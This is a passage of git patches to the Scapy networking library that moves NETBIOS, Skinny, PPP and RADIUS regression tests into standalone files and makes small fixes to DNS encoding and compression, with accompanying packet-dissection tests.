basic SCTPChunkAddressConf - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc1\x00\x00\x08\x00\x00\x00\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkAddressConf)) +assert(p.flags == 0) +assert(p.len == 8) +assert(p.seq == 0) +assert(p.params == []) + += basic SCTPChunkAddressConfAck - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x08\x00\x00\x00\x00" +p = SCTP(blob).lastlayer() +assert(isinstance(p, SCTPChunkAddressConfAck)) +assert(p.flags == 0) +assert(p.len == 8) +assert(p.seq == 0) +assert(p.params == []) + += SCTPChunkParamRandom - Consecutive calls +~ sctp +param1, param2 = SCTPChunkParamRandom(), SCTPChunkParamRandom() +assert(param1.random != param2.random) From 93102e2453463895d1bb732f389fc27bb19e6c43 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 5 Nov 2020 10:52:17 +0100 Subject: [PATCH 0379/1632] Standalone NETBIOS unit tests Co-authored-by: Gabriel Potter --- test/regression.uts | 15 --------------- test/scapy/layers/netbios.uts | 17 +++++++++++++++++ 2 files changed, 17 insertions(+), 15 deletions(-) create mode 100644 test/scapy/layers/netbios.uts diff --git a/test/regression.uts b/test/regression.uts index c876e5c3531..e12a1474654 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -6744,21 +6744,6 @@ for binfrm in ["\x00" * 15, b"\x00" * 17]: assert rc -############ -############ -+ Netbios tests - -= NBNSQueryRequest - build - -z = NBNSQueryRequest(SUFFIX="file server service", QUESTION_NAME='TEST1', QUESTION_TYPE='NB') - -assert raw(z) == b'\x00\x00\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00 FEEFFDFEDBCACACACACACACACACACACA\x00\x00 \x00\x01' - -pkt = IP(dst='192.168.0.255')/UDP(sport=137, dport='netbios_ns')/z -pkt = IP(raw(pkt)) -assert pkt.QUESTION_NAME == b'TEST1 ' - - ############ ############ + MGCP tests diff --git a/test/scapy/layers/netbios.uts b/test/scapy/layers/netbios.uts new file mode 100644 index 00000000000..989431452ab --- /dev/null +++ b/test/scapy/layers/netbios.uts @@ -0,0 +1,17 @@ +% NETBIOS regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + +############ +############ ++ Netbios tests + += NBNSQueryRequest - build + +z = NBNSQueryRequest(SUFFIX="file server service", QUESTION_NAME='TEST1', QUESTION_TYPE='NB') + +assert raw(z) == b'\x00\x00\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00 FEEFFDFEDBCACACACACACACACACACACA\x00\x00 \x00\x01' + +pkt = IP(dst='192.168.0.255')/UDP(sport=137, dport='netbios_ns')/z +pkt = IP(raw(pkt)) +assert pkt.QUESTION_NAME == b'TEST1 ' \ No newline at end of file From 8eb60e444ae29925085f2aeef91342ac5dd7440e Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 5 Nov 2020 10:54:11 +0100 Subject: [PATCH 0380/1632] Standalone Skinny unit tests Co-authored-by: Gabriel Potter --- test/regression.uts | 9 --------- test/scapy/layers/skinny.uts | 12 ++++++++++++ 2 files changed, 12 insertions(+), 9 deletions(-) create mode 100644 test/scapy/layers/skinny.uts diff --git a/test/regression.uts b/test/regression.uts index e12a1474654..43c74e6b77a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -6968,15 +6968,6 @@ r = b'\x01\x00\x00\x1c0x10x20x30x40x50\x02\x08geheim' p = Radius(r) assert isinstance(p.attributes[0], RadiusAttr_User_Password) -############ -############ -+ Skinny tests - -= Skinny - build & dissection -p = raw(IP(src="127.0.0.1")/TCP()/Skinny(msg="ServiceURLStatMessage")) -assert p == b'E\x00\x004\x00\x01\x00\x00@\x06|\xc1\x7f\x00\x00\x01\x7f\x00\x00\x01\x07\xd0\x07\xd0\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00S3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/\x01\x00\x00' -assert IP(p)[Skinny].msg == 303 - ############ ############ diff --git a/test/scapy/layers/skinny.uts b/test/scapy/layers/skinny.uts new file mode 100644 index 00000000000..808598adbba --- /dev/null +++ b/test/scapy/layers/skinny.uts @@ -0,0 +1,12 @@ +% Skinny regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + +############ +############ ++ Skinny tests + += Skinny - build & dissection +p = raw(IP(src="127.0.0.1")/TCP()/Skinny(msg="ServiceURLStatMessage")) +assert p == b'E\x00\x004\x00\x01\x00\x00@\x06|\xc1\x7f\x00\x00\x01\x7f\x00\x00\x01\x07\xd0\x07\xd0\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00S3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/\x01\x00\x00' +assert IP(p)[Skinny].msg == 303 From 9300beff3752a272e9f683685f22492b4165c5d7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tom=C3=A1=C5=A1=20Szaniszlo?= Date: Fri, 6 Nov 2020 11:54:55 +0100 Subject: [PATCH 0381/1632] Add missing space in a message --- scapy/layers/dns.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index bbe717c21dd..eed295b8723 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -87,7 +87,7 @@ def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): _fullpacket = True else: # No -> abort - raise Scapy_Exception("DNS message can't be compressed" + + raise Scapy_Exception("DNS message can't be compressed " + "at this point!") processed_pointers.append(pointer) continue From 63edacefcfea1199982a3e0681171b6829f80956 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 6 Nov 2020 14:26:58 +0100 Subject: [PATCH 0382/1632] Clear cache in dns_compress --- scapy/layers/dns.py | 4 +++- test/scapy/layers/dns.uts | 23 +++++++++++++++++++++++ 2 files changed, 26 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index eed295b8723..d98f966ddb0 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -117,7 +117,8 @@ def dns_encode(x, check_built=False): return b"\x00" if check_built and b"." not in x and ( - orb(x[-1]) == 0 or (orb(x[-2]) & 0xc0) == 0xc0 + (x and orb(x[-1]) == 0) or + (len(x) >= 2 and (orb(x[-2]) & 0xc0) == 0xc0) ): # The value has already been processed. Do not process it again return x @@ -145,6 +146,7 @@ def dns_compress(pkt): raise Scapy_Exception("Can only compress DNS layers") pkt = pkt.copy() dns_pkt = pkt.getlayer(DNS) + dns_pkt.clear_cache() build_pkt = raw(dns_pkt) def field_gen(dns_pkt): diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 9123ee67995..b3da10e6741 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -180,3 +180,26 @@ try: assert False except Scapy_Exception as e: assert str(e) == "Malformed DNS message: invalid length!" + += DNS - dns_compress on decompressed packet + +data = b'E\x00\x00n~\x82\x00\x00{\x11\xae\xeb\x08\x08\x08\x08\x01\x01\x01\x01\x005\x005\x00Z!\x17\x00\x00\x81\x80\x00\x01\x00\x00\x00\x01\x00\x00\x03www\x06google\x03com\x00\x00\x0f\x00\x01\xc0\x10\x00\x06\x00\x01\x00\x00\x002\x00&\x03ns1\xc0\x10\tdns-admin\xc0\x10\x14Po\x8f\x00\x00\x03\x84\x00\x00\x03\x84\x00\x00\x07\x08\x00\x00\x00<' + +p = IP(data) +assert p.ns.rrname == b"google.com." +assert p.ns.mname == b"ns1.google.com." +assert p.ns.rname == b"dns-admin.google.com." +cp = dns_compress(p) +assert cp.ns.rrname == b'\xc0\x10' +assert cp.ns.mname == b'\x03ns1\xc0\x10' +assert cp.ns.rname == b'\tdns-admin\xc0\x10' +p = IP(raw(cp)) +assert p.ns.rrname == b"google.com." +assert p.ns.mname == b"ns1.google.com." +assert p.ns.rname == b"dns-admin.google.com." + += DNS - dns_encode edge cases + +assert dns_encode(b"www.google.com") == b'\x03www\x06google\x03com\x00' +assert dns_encode(b"*") == b'\x01*\x00' +assert dns_encode(dns_encode(b"*")) == b'\x03\x01*\x00' From 2a9a00b26a87e6b1c594a9b4b1e0e96cbc62a76a Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 4 Nov 2020 13:52:59 +0100 Subject: [PATCH 0383/1632] Standalone PPP unit tests Co-authored-by: Phil Co-authored-by: Gabriel Co-authored-by: Guillaume Valadon Co-authored-by: Pierre LALET Co-authored-by: Trong-Vu Tran --- test/regression.uts | 107 ------------------------------------- test/scapy/layers/ppp.uts | 108 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 108 insertions(+), 107 deletions(-) create mode 100644 test/scapy/layers/ppp.uts diff --git a/test/regression.uts b/test/regression.uts index 43c74e6b77a..1caf5b7120c 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1878,113 +1878,6 @@ assert(q[IPOption_LSRR].get_current_router() == "1.2.3.4") assert(q[IPOption_Security].transmission_control_code == b"XYZ") assert(q[TCP].flags == 2) - -############ -############ -+ Test PPP - -= PPPoE -~ ppp pppoe -p=Ether(b'\xff\xff\xff\xff\xff\xff\x08\x00\x27\xf3<5\x88c\x11\x09\x00\x00\x00\x0c\x01\x01\x00\x00\x01\x03\x00\x04\x01\x02\x03\x04\x00\x00\x00\x00') -p -assert(p[Ether].type==0x8863) -assert(PPPoED in p) -assert(p[PPPoED].version==1) -assert(p[PPPoED].type==1) -assert(p[PPPoED].code==0x09) -assert(PPPoED_Tags in p) -q=p[PPPoED_Tags] -assert(q.tag_list is not None) -r=q.tag_list -assert(r[0].tag_type==0x0101) -assert(r[1].tag_type==0x0103) -assert(r[1].tag_len==4) -assert(r[1].tag_value==b'\x01\x02\x03\x04') -assert(r[2].tag_type==0x0000) - -= PPPoE with padding -~ ppp pppoe -p = CookedLinux(b'\x00\x00\x00\x01\x00\x06\x00\x1d\xaa\x00\x00\x00\x00\x00\x88c\x11\xa7\x08\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8e\xf3\x9d\xf1\xc5C\xbe\xde') -assert p.summary() == 'CookedLinux / PPPoE Active Discovery Terminate (PADT) / Padding' -assert p[PPPoED].len == 0 -assert len(p[Padding].load) == 44 - -= PPP/HDLC -~ ppp hdlc -p = HDLC()/PPP()/PPP_IPCP() -p -s = raw(p) -s -assert(s == b'\xff\x03\x80!\x01\x00\x00\x04') -p = PPP(s) -p -assert(HDLC in p) -assert(p[HDLC].control==3) -assert(p[PPP].proto==0x8021) -q = PPP(s[2:]) -q -assert(HDLC not in q) -assert(q[PPP].proto==0x8021) - - -= PPP IPCP -~ ppp ipcp -p = PPP(b'\x80!\x01\x01\x00\x10\x03\x06\xc0\xa8\x01\x01\x02\x06\x00-\x0f\x01') -p -assert(p[PPP_IPCP].code == 1) -assert(p[PPP_IPCP_Option_IPAddress].data=="192.168.1.1") -assert(p[PPP_IPCP_Option].data == b'\x00-\x0f\x01') -p=PPP()/PPP_IPCP(options=[PPP_IPCP_Option_DNS1(data="1.2.3.4"),PPP_IPCP_Option_DNS2(data="5.6.7.8"),PPP_IPCP_Option_NBNS2(data="9.10.11.12")]) -r = raw(p) -r -assert(r == b'\x80!\x01\x00\x00\x16\x81\x06\x01\x02\x03\x04\x83\x06\x05\x06\x07\x08\x84\x06\t\n\x0b\x0c') -q = PPP(r) -q -assert(raw(p) == raw(q)) -assert(PPP(raw(q))==q) -p = PPP()/PPP_IPCP(options=[PPP_IPCP_Option_DNS1(data="1.2.3.4"),PPP_IPCP_Option_DNS2(data="5.6.7.8"),PPP_IPCP_Option(type=123,data="ABCDEFG"),PPP_IPCP_Option_NBNS2(data="9.10.11.12")]) -p -r = raw(p) -r -assert(r == b'\x80!\x01\x00\x00\x1f\x81\x06\x01\x02\x03\x04\x83\x06\x05\x06\x07\x08{\tABCDEFG\x84\x06\t\n\x0b\x0c') -q = PPP(r) -q -assert( q[PPP_IPCP_Option].type == 123 ) -assert( q[PPP_IPCP_Option].data == b"ABCDEFG" ) -assert( q[PPP_IPCP_Option_NBNS2].data == '9.10.11.12' ) - - -= PPP ECP -~ ppp ecp - -p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui=0x58595a)]) -p -r = raw(p) -r -assert(r == b'\x80S\x01\x00\x00\n\x00\x06XYZ\x00') -q = PPP(r) -q -assert(raw(p) == raw(q)) -p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui=0x58595a),PPP_ECP_Option(type=1,data="ABCDEFG")]) -p -r = raw(p) -r -assert(r == b'\x80S\x01\x00\x00\x13\x00\x06XYZ\x00\x01\tABCDEFG') -q = PPP(r) -q -assert( raw(p) == raw(q) ) -assert( q[PPP_ECP_Option].data == b"ABCDEFG" ) - - -= PPP with only one byte for protocol -~ ppp - -assert(len(raw(PPP() / IP())) == 21) - -p = PPP(b'!E\x00\x00<\x00\x00@\x008\x06\xa5\xce\x85wP)\xc0\xa8Va\x01\xbbd\x8a\xe2}r\xb8O\x95\xb5\x84\xa0\x12q \xc8\x08\x00\x00\x02\x04\x02\x18\x04\x02\x08\nQ\xdf\xd6\xb0\x00\x07LH\x01\x03\x03\x07Ao') -assert(IP in p) -assert(TCP in p) - # Scapy6 Regression Test Campaign ############ diff --git a/test/scapy/layers/ppp.uts b/test/scapy/layers/ppp.uts new file mode 100644 index 00000000000..ece97bd3ef0 --- /dev/null +++ b/test/scapy/layers/ppp.uts @@ -0,0 +1,108 @@ +% Scapy PPP layer tests + +############ +############ ++ PPP tests + += PPPoE +~ ppp pppoe +p=Ether(b'\xff\xff\xff\xff\xff\xff\x08\x00\x27\xf3<5\x88c\x11\x09\x00\x00\x00\x0c\x01\x01\x00\x00\x01\x03\x00\x04\x01\x02\x03\x04\x00\x00\x00\x00') +p +assert(p[Ether].type==0x8863) +assert(PPPoED in p) +assert(p[PPPoED].version==1) +assert(p[PPPoED].type==1) +assert(p[PPPoED].code==0x09) +assert(PPPoED_Tags in p) +q=p[PPPoED_Tags] +assert(q.tag_list is not None) +r=q.tag_list +assert(r[0].tag_type==0x0101) +assert(r[1].tag_type==0x0103) +assert(r[1].tag_len==4) +assert(r[1].tag_value==b'\x01\x02\x03\x04') +assert(r[2].tag_type==0x0000) + += PPPoE with padding +~ ppp pppoe +p = CookedLinux(b'\x00\x00\x00\x01\x00\x06\x00\x1d\xaa\x00\x00\x00\x00\x00\x88c\x11\xa7\x08\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8e\xf3\x9d\xf1\xc5C\xbe\xde') +assert p.summary() == 'CookedLinux / PPPoE Active Discovery Terminate (PADT) / Padding' +assert p[PPPoED].len == 0 +assert len(p[Padding].load) == 44 + += PPP/HDLC +~ ppp hdlc +p = HDLC()/PPP()/PPP_IPCP() +p +s = raw(p) +s +assert(s == b'\xff\x03\x80!\x01\x00\x00\x04') +p = PPP(s) +p +assert(HDLC in p) +assert(p[HDLC].control==3) +assert(p[PPP].proto==0x8021) +q = PPP(s[2:]) +q +assert(HDLC not in q) +assert(q[PPP].proto==0x8021) + + += PPP IPCP +~ ppp ipcp +p = PPP(b'\x80!\x01\x01\x00\x10\x03\x06\xc0\xa8\x01\x01\x02\x06\x00-\x0f\x01') +p +assert(p[PPP_IPCP].code == 1) +assert(p[PPP_IPCP_Option_IPAddress].data=="192.168.1.1") +assert(p[PPP_IPCP_Option].data == b'\x00-\x0f\x01') +p=PPP()/PPP_IPCP(options=[PPP_IPCP_Option_DNS1(data="1.2.3.4"),PPP_IPCP_Option_DNS2(data="5.6.7.8"),PPP_IPCP_Option_NBNS2(data="9.10.11.12")]) +r = raw(p) +r +assert(r == b'\x80!\x01\x00\x00\x16\x81\x06\x01\x02\x03\x04\x83\x06\x05\x06\x07\x08\x84\x06\t\n\x0b\x0c') +q = PPP(r) +q +assert(raw(p) == raw(q)) +assert(PPP(raw(q))==q) +p = PPP()/PPP_IPCP(options=[PPP_IPCP_Option_DNS1(data="1.2.3.4"),PPP_IPCP_Option_DNS2(data="5.6.7.8"),PPP_IPCP_Option(type=123,data="ABCDEFG"),PPP_IPCP_Option_NBNS2(data="9.10.11.12")]) +p +r = raw(p) +r +assert(r == b'\x80!\x01\x00\x00\x1f\x81\x06\x01\x02\x03\x04\x83\x06\x05\x06\x07\x08{\tABCDEFG\x84\x06\t\n\x0b\x0c') +q = PPP(r) +q +assert( q[PPP_IPCP_Option].type == 123 ) +assert( q[PPP_IPCP_Option].data == b"ABCDEFG" ) +assert( q[PPP_IPCP_Option_NBNS2].data == '9.10.11.12' ) + + += PPP ECP +~ ppp ecp + +p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui=0x58595a)]) +p +r = raw(p) +r +assert(r == b'\x80S\x01\x00\x00\n\x00\x06XYZ\x00') +q = PPP(r) +q +assert(raw(p) == raw(q)) +p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui=0x58595a),PPP_ECP_Option(type=1,data="ABCDEFG")]) +p +r = raw(p) +r +assert(r == b'\x80S\x01\x00\x00\x13\x00\x06XYZ\x00\x01\tABCDEFG') +q = PPP(r) +q +assert( raw(p) == raw(q) ) +assert( q[PPP_ECP_Option].data == b"ABCDEFG" ) + + += PPP with only one byte for protocol +~ ppp + +assert(len(raw(PPP() / IP())) == 21) + +p = PPP(b'!E\x00\x00<\x00\x00@\x008\x06\xa5\xce\x85wP)\xc0\xa8Va\x01\xbbd\x8a\xe2}r\xb8O\x95\xb5\x84\xa0\x12q \xc8\x08\x00\x00\x02\x04\x02\x18\x04\x02\x08\nQ\xdf\xd6\xb0\x00\x07LH\x01\x03\x03\x07Ao') +assert(IP in p) +assert(TCP in p) + From 5eb1fceff259a75a58a2c4be5c860ec56733797f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 6 Nov 2020 08:34:58 +0100 Subject: [PATCH 0384/1632] Standalone Radius unit tests Co-authored-by: Pierre Lorinquer Co-authored-by: Gabriel Co-authored-by: Adam Karpierz --- test/regression.uts | 212 ---------------------------------- test/scapy/layers/radius.uts | 213 +++++++++++++++++++++++++++++++++++ 2 files changed, 213 insertions(+), 212 deletions(-) create mode 100644 test/scapy/layers/radius.uts diff --git a/test/regression.uts b/test/regression.uts index 1caf5b7120c..c205784ece1 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -6650,218 +6650,6 @@ pkt = Ether(b'\x1b\x81\xb8\xa8J5\xe3\xebn\x90q\xb8\x08\x00E\x00\x00E\x00\x01\x00 assert pkt[MGCP].endpoint == b'god@heaven.com' -############ -############ -+ RADIUS tests - -= IP/UDP/RADIUS - Build -s = raw(IP()/UDP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy")) -s == b'E\x00\x007\x00\x01\x00\x00@\x11|\xb3\x7f\x00\x00\x01\x7f\x00\x00\x01\x07\x14\x07\x14\x00#U\xb3\x01\x00\x00\x1bscapy\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x07scapy' - -= IP/UDP/RADIUS - Dissection -p = IP(s) -Radius in p and len(p[Radius].attributes) == 1 and p[Radius].attributes[0].value == b"scapy" - -= RADIUS - Access-Request - Dissection (1) -s = b'\x01\xae\x01\x17>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O\x0b\x02\x01\x00\t\x01leapP\x12U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6' -radius_packet = Radius(s) -assert(radius_packet.id == 174) -assert(radius_packet.len == 279) -assert(radius_packet.authenticator == b'>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z') -assert(len(radius_packet.attributes) == 17) -assert(radius_packet.attributes[0].type == 1) -assert(type(radius_packet.attributes[0]) == RadiusAttr_User_Name) -assert(radius_packet.attributes[0].len == 6) -assert(radius_packet.attributes[0].value == b"leap") -assert(radius_packet.attributes[1].type == 6) -assert(type(radius_packet.attributes[1]) == RadiusAttr_Service_Type) -assert(radius_packet.attributes[1].len == 6) -assert(radius_packet.attributes[1].value == 2) -assert(radius_packet.attributes[2].type == 26) -assert(type(radius_packet.attributes[2]) == RadiusAttr_Vendor_Specific) -assert(radius_packet.attributes[2].len == 27) -assert(radius_packet.attributes[2].vendor_id == 9) -assert(radius_packet.attributes[2].vendor_type == 1) -assert(radius_packet.attributes[2].vendor_len == 21) -assert(radius_packet.attributes[2].value == b"service-type=Framed") -assert(radius_packet.attributes[6].type == 79) -assert(type(radius_packet.attributes[6]) == RadiusAttr_EAP_Message) -assert(radius_packet.attributes[6].len == 11) -assert(radius_packet.attributes[6].value.haslayer(EAP)) -assert(radius_packet.attributes[6].value[EAP].code == 2) -assert(radius_packet.attributes[6].value[EAP].id == 1) -assert(radius_packet.attributes[6].value[EAP].len == 9) -assert(radius_packet.attributes[6].value[EAP].type == 1) -assert(hasattr(radius_packet.attributes[6].value[EAP], "identity")) -assert(radius_packet.attributes[6].value[EAP].identity == b"leap") -assert(radius_packet.attributes[7].type == 80) -assert(type(radius_packet.attributes[7]) == RadiusAttr_Message_Authenticator) -assert(radius_packet.attributes[7].len == 18) -assert(radius_packet.attributes[7].value == b'U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6') -assert(radius_packet.attributes[11].type == 8) -assert(type(radius_packet.attributes[11]) == RadiusAttr_Framed_IP_Address) -assert(radius_packet.attributes[11].len == 6) -assert(radius_packet.attributes[11].value == '192.168.10.185') -assert(radius_packet.attributes[16].type == 5) -assert(type(radius_packet.attributes[16]) == RadiusAttr_NAS_Port) -assert(radius_packet.attributes[16].len == 6) -assert(radius_packet.attributes[16].value == 50118) - -f,v = radius_packet.getfield_and_val("authenticator") -assert f.i2repr(None, v) == '3e6bd4c419560b2a3199c844eac2945a' - -= RADIUS - compute_message_authenticator() -ram = radius_packet[RadiusAttr_Message_Authenticator] -assert ram.compute_message_authenticator(radius_packet, b"dummy bytes", b"scapy") == b'I\x85l\x8f\xa5\xd6\xbc\xb5\x08\xe0<\xebH\x9d\xfb?' - -= RADIUS - Access-Challenge - Dissection (2) -s = b'\x0b\xae\x00[\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8\x12\rHello, leapO\x16\x01\x02\x00\x14\x11\x01\x00\x08\xb8\xc4\x1a4\x97x\xd3\x82leapP\x12\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c\x18\x12iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' -radius_packet = Radius(s) -assert(radius_packet.id == 174) -assert(radius_packet.len == 91) -assert(radius_packet.authenticator == b'\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8') -assert(len(radius_packet.attributes) == 4) -assert(radius_packet.attributes[0].type == 18) -assert(type(radius_packet.attributes[0]) == RadiusAttribute) -assert(radius_packet.attributes[0].len == 13) -assert(radius_packet.attributes[0].value == b"Hello, leap") -assert(radius_packet.attributes[1].type == 79) -assert(type(radius_packet.attributes[1]) == RadiusAttr_EAP_Message) -assert(radius_packet.attributes[1].len == 22) -assert(radius_packet.attributes[1][EAP].code == 1) -assert(radius_packet.attributes[1][EAP].id == 2) -assert(radius_packet.attributes[1][EAP].len == 20) -assert(radius_packet.attributes[1][EAP].type == 17) -assert(radius_packet.attributes[2].type == 80) -assert(type(radius_packet.attributes[2]) == RadiusAttr_Message_Authenticator) -assert(radius_packet.attributes[2].len == 18) -assert(radius_packet.attributes[2].value == b'\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c') -assert(radius_packet.attributes[3].type == 24) -assert(type(radius_packet.attributes[3]) == RadiusAttr_State) -assert(radius_packet.attributes[3].len == 18) -assert(radius_packet.attributes[3].value == b'iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO') - -= RADIUS - Access-Request - Dissection (3) -s = b'\x01\xaf\x01DC\xbe!J\x08\xdf\xcf\x9f\x00v~,\xfb\x8e`\xc8\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O&\x02\x02\x00$\x11\x01\x00\x18\rE\xc9\x92\xf6\x9ae\x04\xa2\x06\x13\x8f\x0b#\xf1\xc56\x8eU\xd9\x89\xe5\xa1)leapP\x12|\x1c\x9d[dv\x9c\x19\x96\xc6\xec\xb82\x8f\n f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6\x18\x12iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' -radius_packet = Radius(s) -assert(radius_packet.id == 175) -assert(radius_packet.len == 324) -assert(radius_packet.authenticator == b'C\xbe!J\x08\xdf\xcf\x9f\x00v~,\xfb\x8e`\xc8') -assert(len(radius_packet.attributes) == 18) -assert(radius_packet.attributes[0].type == 1) -assert(type(radius_packet.attributes[0]) == RadiusAttr_User_Name) -assert(radius_packet.attributes[0].len == 6) -assert(radius_packet.attributes[0].value == b"leap") -assert(radius_packet.attributes[1].type == 6) -assert(type(radius_packet.attributes[1]) == RadiusAttr_Service_Type) -assert(radius_packet.attributes[1].len == 6) -assert(radius_packet.attributes[1].value == 2) -assert(radius_packet.attributes[2].type == 26) -assert(type(radius_packet.attributes[2]) == RadiusAttr_Vendor_Specific) -assert(radius_packet.attributes[2].len == 27) -assert(radius_packet.attributes[2].vendor_id == 9) -assert(radius_packet.attributes[2].vendor_type == 1) -assert(radius_packet.attributes[2].vendor_len == 21) -assert(radius_packet.attributes[2].value == b"service-type=Framed") -assert(radius_packet.attributes[6].type == 79) -assert(type(radius_packet.attributes[6]) == RadiusAttr_EAP_Message) -assert(radius_packet.attributes[6].len == 38) -assert(radius_packet.attributes[6].value.haslayer(EAP)) -assert(radius_packet.attributes[6].value[EAP].code == 2) -assert(radius_packet.attributes[6].value[EAP].id == 2) -assert(radius_packet.attributes[6].value[EAP].len == 36) -assert(radius_packet.attributes[6].value[EAP].type == 17) -assert(radius_packet.attributes[7].type == 80) -assert(type(radius_packet.attributes[7]) == RadiusAttr_Message_Authenticator) -assert(radius_packet.attributes[7].len == 18) -assert(radius_packet.attributes[7].value == b'|\x1c\x9d[dv\x9c\x19\x96\xc6\xec\xb82\x8f\n ') -assert(radius_packet.attributes[11].type == 8) -assert(type(radius_packet.attributes[11]) == RadiusAttr_Framed_IP_Address) -assert(radius_packet.attributes[11].len == 6) -assert(radius_packet.attributes[11].value == '192.168.10.185') -assert(radius_packet.attributes[16].type == 5) -assert(type(radius_packet.attributes[16]) == RadiusAttr_NAS_Port) -assert(radius_packet.attributes[16].len == 6) -assert(radius_packet.attributes[16].value == 50118) -assert(radius_packet.attributes[17].type == 24) -assert(type(radius_packet.attributes[17]) == RadiusAttr_State) -assert(radius_packet.attributes[17].len == 18) -assert(radius_packet.attributes[17].value == b'iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO') - -= RADIUS - Access-Challenge - Dissection (4) -s = b'\x0b\xaf\x00K\x82 \x95=\xfd\x80\x05 -l}\xab)\xa5kU\x12\rHello, leapO\x06\x03\x03\x00\x04P\x12l0\xb9\x8d\xca\xfc!\xf3\xa7\x08\x80\xe1\xf6}\x84\xff\x18\x12iQs\xf7hRb@k\x9d,\xa0\x99\x8ehO' -radius_packet = Radius(s) -assert(radius_packet.id == 175) -assert(radius_packet.len == 75) -assert(radius_packet.authenticator == b'\x82 \x95=\xfd\x80\x05 -l}\xab)\xa5kU') -assert(len(radius_packet.attributes) == 4) -assert(radius_packet.attributes[0].type == 18) -assert(type(radius_packet.attributes[0]) == RadiusAttribute) -assert(radius_packet.attributes[0].len == 13) -assert(radius_packet.attributes[0].value == b"Hello, leap") -assert(radius_packet.attributes[1].type == 79) -assert(type(radius_packet.attributes[1]) == RadiusAttr_EAP_Message) -assert(radius_packet.attributes[1].len == 6) -assert(radius_packet.attributes[1][EAP].code == 3) -assert(radius_packet.attributes[1][EAP].id == 3) -assert(radius_packet.attributes[1][EAP].len == 4) -assert(radius_packet.attributes[2].type == 80) -assert(type(radius_packet.attributes[2]) == RadiusAttr_Message_Authenticator) -assert(radius_packet.attributes[2].len == 18) 